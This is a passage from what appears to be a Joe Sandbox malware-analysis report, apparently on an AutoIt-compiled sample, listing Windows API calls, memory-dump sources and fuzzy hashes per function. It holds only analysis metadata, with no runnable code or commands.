                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$DrawInfoInsert_memset
                          • String ID: 0
                          • API String ID: 3866635326-4108050209
                          • Opcode ID: ec90e2773cd42d9d99bfcd9d19dd0fad379aa15a2dff32a37d67c52c5d86e3e0
                          • Instruction ID: 7d6271df02e9a17c22829e72e36fff6a743e5d5d42cc36e5283e49253f6148dc
                          • Opcode Fuzzy Hash: ec90e2773cd42d9d99bfcd9d19dd0fad379aa15a2dff32a37d67c52c5d86e3e0
                          • Instruction Fuzzy Hash: AE412774A14209AFDF20DF94D884EAABBF8FB09354F04806AED1597361E730AD55DFA0
                          APIs
                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 005913F9
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00591423
                          • FreeLibrary.KERNEL32(00000000), ref: 005914DA
                            • Part of subcall function 005913CA: RegCloseKey.ADVAPI32(?), ref: 00591440
                            • Part of subcall function 005913CA: FreeLibrary.KERNEL32(?), ref: 00591492
                            • Part of subcall function 005913CA: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005914B5
                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 0059147D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: EnumFreeLibrary$CloseDeleteOpen
                          • String ID:
                          • API String ID: 395352322-0
                          • Opcode ID: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                          • Instruction ID: bc6777bf1caf3a5f78c7d54a2cd5f8aff98b6833aecba6b2249c85b66032b818
                          • Opcode Fuzzy Hash: c1dabd276af17496566ae5b94bbf12b98591e4705f14173d715ddfa893df6a71
                          • Instruction Fuzzy Hash: B3311C7191011ABFDF15DF90DC89EFFBBBCFB19340F000169E516A2140EB749E499AA4
                          APIs
                          • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 005966D9
                          • GetWindowLongW.USER32(01235480,000000F0), ref: 0059670C
                          • GetWindowLongW.USER32(01235480,000000F0), ref: 00596741
                          • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00596773
                          • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 0059679D
                          • GetWindowLongW.USER32(?,000000F0), ref: 005967AE
                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 005967C8
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend
                          • String ID:
                          • API String ID: 2178440468-0
                          • Opcode ID: fe183e2126052c97f80a737cc99342c7fcebfec877bd99bca3033b26b68432c8
                          • Instruction ID: 1b72128285e285bd1f4fdb61abcf1ec64fbd583dd1977d4d8e1614e1739430a4
                          • Opcode Fuzzy Hash: fe183e2126052c97f80a737cc99342c7fcebfec877bd99bca3033b26b68432c8
                          • Instruction Fuzzy Hash: 0B313634604150AFDF20CF98DC84F553BE1FB9A758F1901A6F6018B2B2CB71AC58EB51
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E0AD
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E0D3
                          • SysAllocString.OLEAUT32(00000000), ref: 0056E0D6
                          • SysAllocString.OLEAUT32(?), ref: 0056E0F4
                          • SysFreeString.OLEAUT32(?), ref: 0056E0FD
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E122
                          • SysAllocString.OLEAUT32(?), ref: 0056E130
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: e8940088e5e8a55c21f1f7aa0457bae8defeb8c9d05640c361dad91275814f94
                          • Instruction ID: 77704c50b2458b41306160c63e58022fd182d07e1eda6c0ef115ce8bdee58f26
                          • Opcode Fuzzy Hash: e8940088e5e8a55c21f1f7aa0457bae8defeb8c9d05640c361dad91275814f94
                          • Instruction Fuzzy Hash: 30219236601219AF9F10DFB8CC89CBB7BECFB0A360B048525FA55DB290D6709C45D760
                          APIs
                            • Part of subcall function 0058823D: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00588268
                          • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00586676
                          • WSAGetLastError.WSOCK32(00000000), ref: 00586685
                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 005866BE
                          • connect.WSOCK32(00000000,?,00000010), ref: 005866C7
                          • WSAGetLastError.WSOCK32 ref: 005866D1
                          • closesocket.WSOCK32(00000000), ref: 005866FA
                          • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00586713
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                          • String ID:
                          • API String ID: 910771015-0
                          • Opcode ID: 82b4c513ade651e54f8cdf55a640a0500341afc64b189c02374012a0d6c40fe9
                          • Instruction ID: 6e718cca3b6b692b2a8112fc43d07144a9e90dd356c5fb98362989edc296970b
                          • Opcode Fuzzy Hash: 82b4c513ade651e54f8cdf55a640a0500341afc64b189c02374012a0d6c40fe9
                          • Instruction Fuzzy Hash: DD31C471600109AFEF10AF64DC89BBE7BADFB45764F004419FD05A72D1EB74AC449BA1
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E188
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056E1AE
                          • SysAllocString.OLEAUT32(00000000), ref: 0056E1B1
                          • SysAllocString.OLEAUT32 ref: 0056E1D2
                          • SysFreeString.OLEAUT32 ref: 0056E1DB
                          • StringFromGUID2.OLE32(?,?,00000028), ref: 0056E1F5
                          • SysAllocString.OLEAUT32(?), ref: 0056E203
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                          • String ID:
                          • API String ID: 3761583154-0
                          • Opcode ID: d4466d902b63bd82795fea77a752c741105f3de744d80ae20c06421e3007cb5e
                          • Instruction ID: 477c1881ef2f0a2a2684165819c63f1bc3fc84f0b30a10069ab0038c990f3bd7
                          • Opcode Fuzzy Hash: d4466d902b63bd82795fea77a752c741105f3de744d80ae20c06421e3007cb5e
                          • Instruction Fuzzy Hash: E8215639605205AF9B109FA8DC8DDBA7BECFB5A360B008125FA15CB2E0D674DC45DBA4
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                          • API String ID: 1038674560-2734436370
                          • Opcode ID: ce045ab5cd9a1b75e3f7b8ff84284cbfc93dcb8684d492d9bb1ff23b1cc73ae1
                          • Instruction ID: 17d967c0e28bec9083d7349c2731dd27c1a0902abf443618df2fcf069dbd4be2
                          • Opcode Fuzzy Hash: ce045ab5cd9a1b75e3f7b8ff84284cbfc93dcb8684d492d9bb1ff23b1cc73ae1
                          • Instruction Fuzzy Hash: C921F53294851A66E321BA25AC06FBB7BD8FF92300F504836FC4587192EB91AD8193A5
                          APIs
                            • Part of subcall function 00512111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0051214F
                            • Part of subcall function 00512111: GetStockObject.GDI32(00000011), ref: 00512163
                            • Part of subcall function 00512111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0051216D
                          • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597A1F
                          • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00597A2C
                          • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00597A37
                          • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597A46
                          • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597A52
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: MessageSend$CreateObjectStockWindow
                          • String ID: Msctls_Progress32
                          • API String ID: 1025951953-3636473452
                          • Opcode ID: de02f86a851e66dfa9ed8c1310383f8377e5c98c1d49402522c1cf3e1347975f
                          • Instruction ID: 9dc5c3d2bf22feae995c6992f29694fa501eba0d366d58cb6f4cea96e4897c37
                          • Opcode Fuzzy Hash: de02f86a851e66dfa9ed8c1310383f8377e5c98c1d49402522c1cf3e1347975f
                          • Instruction Fuzzy Hash: DB1190B215021DBEEF119F60CC85EEB7F5DFF48758F014115BB04A2090C6729C21DBA4
                          APIs
                          • __init_pointers.LIBCMT ref: 00539C46
                            • Part of subcall function 005332E9: EncodePointer.KERNEL32(00000000), ref: 005332EC
                            • Part of subcall function 005332E9: __initp_misc_winsig.LIBCMT ref: 00533307
                            • Part of subcall function 005332E9: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 0053A000
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0053A014
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0053A027
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0053A03A
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0053A04D
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 0053A060
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 0053A073
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 0053A086
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 0053A099
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 0053A0AC
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 0053A0BF
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 0053A0D2
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 0053A0E5
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 0053A0F8
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 0053A10B
                            • Part of subcall function 005332E9: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0053A11E
                          • __mtinitlocks.LIBCMT ref: 00539C4B
                          • __mtterm.LIBCMT ref: 00539C54
                            • Part of subcall function 00539CBC: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539C59,00537E2D,005CB0B8,00000014), ref: 00539DB6
                            • Part of subcall function 00539CBC: _free.LIBCMT ref: 00539DBD
                            • Part of subcall function 00539CBC: DeleteCriticalSection.KERNEL32(0B],?,?,00539C59,00537E2D,005CB0B8,00000014), ref: 00539DDF
                          • __calloc_crt.LIBCMT ref: 00539C79
                          • __initptd.LIBCMT ref: 00539C9B
                          • GetCurrentThreadId.KERNEL32 ref: 00539CA2
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                          • String ID:
                          • API String ID: 3567560977-0
                          • Opcode ID: d6f82fc2a7bbe7911da4720722d20458fdc6cd8b0f92261163a70f66efcafb10
                          • Instruction ID: 989bc2808fd2a15b551983dd32c93df1e595a0e75558d28f6e1fd7f607f1f228
                          • Opcode Fuzzy Hash: d6f82fc2a7bbe7911da4720722d20458fdc6cd8b0f92261163a70f66efcafb10
                          • Instruction Fuzzy Hash: C9F06DB255971729EB3577797C0B79A3FD4BB82730F20162AF450C50D2EEE18C059251
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,005341B2,?), ref: 00534103
                          • GetProcAddress.KERNEL32(00000000), ref: 0053410A
                          • EncodePointer.KERNEL32(00000000), ref: 00534116
                          • DecodePointer.KERNEL32(00000001,005341B2,?), ref: 00534133
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                          • String ID: RoInitialize$combase.dll
                          • API String ID: 3489934621-340411864
                          • Opcode ID: 66e257eb97fc2037d68f56566d30cf82f9c0c4b5fb499b1c42743e28ac9ad7f1
                          • Instruction ID: 70c5375f5133ab4412b73e214945b82d6594cd1e54dff9546a5c4712624dc70a
                          • Opcode Fuzzy Hash: 66e257eb97fc2037d68f56566d30cf82f9c0c4b5fb499b1c42743e28ac9ad7f1
                          • Instruction Fuzzy Hash: 3DE01AB06A1B00AFDF601FB0EC4DB593B64BB36B06F405826B451D52E0DBB5509CEF00
                          APIs
                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,005340D8), ref: 005341D8
                          • GetProcAddress.KERNEL32(00000000), ref: 005341DF
                          • EncodePointer.KERNEL32(00000000), ref: 005341EA
                          • DecodePointer.KERNEL32(005340D8), ref: 00534205
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                          • String ID: RoUninitialize$combase.dll
                          • API String ID: 3489934621-2819208100
                          • Opcode ID: 4f6df1d62895961bcccddd164720033c896817ed679d20fa2915b6166bc5812a
                          • Instruction ID: 1d279eb7dceedb497d58d7cd05037fbd5b9c303f38f52db3a2f11cd6aa3da6f7
                          • Opcode Fuzzy Hash: 4f6df1d62895961bcccddd164720033c896817ed679d20fa2915b6166bc5812a
                          • Instruction Fuzzy Hash: 60E09278562311ABDB609BA0AD0DB553FA4BB32746F109527F001E10E0CBB45588EE10
                          APIs
                          • GetClientRect.USER32(?,?), ref: 005121B8
                          • GetWindowRect.USER32(?,?), ref: 005121F9
                          • ScreenToClient.USER32(?,?), ref: 00512221
                          • GetClientRect.USER32(?,?), ref: 00512350
                          • GetWindowRect.USER32(?,?), ref: 00512369
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Rect$Client$Window$Screen
                          • String ID:
                          • API String ID: 1296646539-0
                          • Opcode ID: fe0d80e171e907d837b88a4146e3539643a1495d07b13a8e5c3cffd76d3d49ec
                          • Instruction ID: bc27e4b9041bd628c4b6f55209a4b0c82df8ddedafcb47c4e10157530bc14eb3
                          • Opcode Fuzzy Hash: fe0d80e171e907d837b88a4146e3539643a1495d07b13a8e5c3cffd76d3d49ec
                          • Instruction Fuzzy Hash: AEB1A039900249DBEF10CFA8C4807EDBBB1FF48314F149529ED69EB254DB34A9A0DB65
                          APIs
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: _memmove$__itow__swprintf
                          • String ID:
                          • API String ID: 3253778849-0
                          • Opcode ID: 269dcaf974729d605ebc68264c869d965c4932a2095ac1c25e852637bf5a6a5c
                          • Instruction ID: c2b2adc355c9637f578fdaf78c93a0459e8b65fff4234fca831e677fcc0b0a86
                          • Opcode Fuzzy Hash: 269dcaf974729d605ebc68264c869d965c4932a2095ac1c25e852637bf5a6a5c
                          • Instruction Fuzzy Hash: B361CD30500A5B9BDF11EF60D889EFE3FA8BF85308F048559F8596B2D2DB30A945DB50
                          APIs
                            • Part of subcall function 00521A36: _memmove.LIBCMT ref: 00521A77
                            • Part of subcall function 00591242: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005901D5,?,?), ref: 00591259
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005906E5
                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00590725
                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590748
                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00590771
                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 005907B4
                          • RegCloseKey.ADVAPI32(00000000), ref: 005907C1
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                          • String ID:
                          • API String ID: 4046560759-0
                          • Opcode ID: 6f482c5860f30d13bbe0e4a3f643d366df12d17795475d18714d179480d5606e
                          • Instruction ID: b89083d3f9fc202ee42f45b930a7694be36b2ef2ee4243054933c497e830d9af
                          • Opcode Fuzzy Hash: 6f482c5860f30d13bbe0e4a3f643d366df12d17795475d18714d179480d5606e
                          • Instruction Fuzzy Hash: 25516731208212AFCB14EB64D899E6BBBE8FF85320F00491DF595872A1DB31E905DB92
                          APIs
                          • GetMenu.USER32(?), ref: 00595C00
                          • GetMenuItemCount.USER32(00000000), ref: 00595C37
                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00595C5F
                          • GetMenuItemID.USER32(?,?), ref: 00595CCE
                          • GetSubMenu.USER32(?,?), ref: 00595CDC
                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595D2D
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Menu$Item$CountMessagePostString
                          • String ID:
                          • API String ID: 650687236-0
                          • Opcode ID: b94115715614c93fbc9e1d7b70e5c921463877620839149cfb9aefc91d8d588a
                          • Instruction ID: d2ebca317850978f3142761f29a2b8cf302f316aa8fc97ccc22658b02974ad02
                          • Opcode Fuzzy Hash: b94115715614c93fbc9e1d7b70e5c921463877620839149cfb9aefc91d8d588a
                          • Instruction Fuzzy Hash: BE518171A00616AFDF16EF64D849AAEBBB5FF88310F104459E901BB391DB70AE41DF90
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 0056F485
                          • VariantClear.OLEAUT32(00000013), ref: 0056F4F7
                          • VariantClear.OLEAUT32(00000000), ref: 0056F552
                          • _memmove.LIBCMT ref: 0056F57C
                          • VariantClear.OLEAUT32(?), ref: 0056F5C9
                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F5F7
                          Memory Dump Source
                          • Source File: 0000000E.00000002.2332058349.0000000000511000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 0000000E.00000002.2331979997.0000000000510000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005A0000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332138658.00000000005C5000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332238256.00000000005CF000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 0000000E.00000002.2332282488.00000000005D8000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_510000_Eco.jbxd
                          Similarity
                          • API ID: Variant$Clear$ChangeInitType_memmove
                          • String ID:
                          • API String ID: 1101466143-0
                          • Opcode ID: 1f4032825510d74a1c3999e108908c91b898ece99042e6a2763d0c917a3327c0
                          • Instruction ID: 1ea9cd73761d310dac5fc7f4ea2907a09b3340c17a831fca121747a308b4f6dc
